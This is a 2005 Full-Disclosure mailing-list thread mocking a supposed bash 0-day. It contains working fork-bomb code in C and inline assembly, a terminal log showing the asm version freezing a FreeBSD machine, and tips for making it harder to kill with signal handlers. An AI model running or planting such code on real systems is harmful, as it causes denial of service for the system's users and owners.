Re: bash vulnerability?

[Jay <jaymzu () gmail com>]

┌(jay@xxx:p4)(~)
└(Power:on-line:100% cat > a.c                                
int main(){
        __asm__(
                "xorl %ecx,%ecx\n"
                "cdq\n"
                "HERE:\n"
                "movl $0x2,%eax\n"
                "int $0x80\n"
                "jmp HERE\n"
        );
}
^C
┌(jay@xxx:p4)(~)
└(130:Power:on-line:100% make a                              
cc -O -pipe -march=pentium4  a.c  -o a
┌(jay@xxx:p4)(~)
└(Power:on-line:100% ./a                               
^C
┌(jay@xxx:p4)(~)
└(130:Power:on-line:100% uname -srm
FreeBSD 6.0-BETA1 i386


the machine froze instantly but eventually, after a minute or so I was
able to ^C

--
Jay

On Tue, 2005-08-16 at 11:10 +0200, Rik Bobbaers wrote:
> On Monday 15 August 2005 09:59, Jay wrote:
> > It's not nice to brag about finding 0-day bullshit in the bash fork
> > bomb that has been Zalewski's signature for years :P
>
> i think i know where he got it from.. i was on an irc channel a couple of days 
> ago, and someone posted it (as a joke off course). it's ... ahm... funny that 
> it comes back over here just a few days later!
>
> i don't know how this is a 0day and gives you remote access (it does the 
> opposite...)
>
> but if you want one that's a bit harder to stop:
>
> c version:
> int main () {
>         while (1) fork();
> }
>
> an asm (quick hack):
> int main(){
>         __asm__(
>                 "xorl %ecx,%ecx\n"
>                 "cdq\n"
>                 "HERE:\n"
>                 "movl $0x2,%eax\n"
>                 "int $0x80\n"
>                 "jmp HERE\n"
>         );
> }
>
> sry it's in c... the machine i made it on didn't have gas or nasm.
>
> anyway, if you compile this and run it in background, it will all die pretty 
> fast. (to make it even harder, make your own signal handlers!(okay, SIGKILL 
> will still work, but it will be harder to kill :))
>
> shall we call this C and assembler 0days? ;)
>
> -- 
> harry
> aka Rik Bobbaers
>
> K.U.Leuven - LUDIT          -=- Tel: +32 485 52 71 50
> Rik.Bobbaers () cc kuleuven be -=- http://harry.ulyssis.org
>
> Disclaimer:
> By sending an email to ANY of my addresses you are agreeing that:
>   1. I am by definition, "the intended recipient"
>   2. All information in the email is mine to do with as I see fit and make 
> such financial profit, political mileage, or good joke as it lends itself to. 
> In particular, I may quote it on usenet.
>   3. I may take the contents as representing the views of your company.
>   4. This overrides any disclaimer or statement of confidentiality that may be 
> included on your message. 
> _______________________________________________
> Full-Disclosure - We believe in it.
> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> Hosted and sponsored by Secunia - http://secunia.com/



-- 
This message was scanned for spam and viruses by BitDefender.
For more information please visit http://www.bitdefender.com/

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/